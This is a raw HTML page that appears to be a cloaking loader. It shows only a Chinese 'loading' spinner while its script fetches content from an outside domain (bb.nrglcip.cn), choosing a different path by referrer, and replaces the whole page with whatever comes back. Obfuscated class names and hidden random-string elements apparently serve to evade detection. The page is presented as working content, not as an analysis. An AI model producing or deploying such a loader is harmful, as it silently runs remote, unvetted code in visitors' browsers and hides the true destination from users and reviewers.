<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .C2Fy8M0 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .C2Fy8M0 .NCCzoF {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .C2Fy8M0 .content {
            line-height: 50px;
            text-align: center
        }

        .C2Fy8M0 .img {
            width: 100%
        }

        .C2Fy8M0 .BimInS9L1i {
            text-align: center
        }

        .C2Fy8M0 .BimInS9L1i span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .C2Fy8M0 .BimInS9L1i span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .C2Fy8M0 .BimInS9L1i span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .C2Fy8M0 .BimInS9L1i span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .C2Fy8M0 .BimInS9L1i span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .C2Fy8M0 .BimInS9L1i span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .C2Fy8M0 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function eeq6bKiPdRU(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var yzUyT = eeq6bKiPdRU('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ yzUyT +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ yzUyT +".html?a=share";
		}
		
        a2BKkpBC=url+"#"+new Date().getTime();
        a2BKkpBC && function() {
            $.get(a2BKkpBC, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >JHT3DGTogpjitvSRQCRV1mx</b>
<span style='display:none'>GN9zupU73EZcJsVrookcKC7ypYnD8oHDOJzBd9rysDRa7KYGXKRGUwpTREEpZcCaum5PoexM1</span>
<div style='display:none'>NKS1r8lVU3tBrPVddLhzzh1r8s6alCTJw77qkFvdnFYrmocjYgLzc6g3AZXnIdI</div><div class="C2Fy8M0">
    <div class="NCCzoF">
        <div class="BimInS9L1i">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>qJ9AgrRYHwGj99Gcit2CQiEiX8e6vLUivL4</p>
<b style='display:none' >tlXHPo5KsohBsstnViOzPuDENGuOMnmLGAdhqsyf2vp36zeSLiVnDZ6hIsv47VkMYMyCaRRLEhpNDaP</b>
<p  style='display:none'>qJ9AgrRYHwGj99Gcit2CQiEiX8e6vLUivL4</p>
<p  style='display:none'>qJ9AgrRYHwGj99Gcit2CQiEiX8e6vLUivL4</p>
<a  href='#' style='display:none'>UeSqrRSJJHu3daPZNiqIUv06l5Z7yl0l92AZEPZyNiNBKdBvwns2xmfnByxMbWzt4zmZtuboA3UA9yRpyCcHlS0aPLamD5pv4Yk6</a>
<ul style='display:none' >NZ2lJyt1lHYK9xYwyKeSWHgHkJnmMImUECOgncZgsW1ws5Xi9cM5ACni8E1Wjrled59p1hEjjynx2qF61i2ek</ul>
<h1 style='display:none' >aEJ682c2VIhe3YUbsqC3C2mXPbvMJFI9CGCu2l3k8Fz2srKNh8vZLL6gSQoINqoehS5YyF7akiPPAcRoVKwm</h1></body>
</html>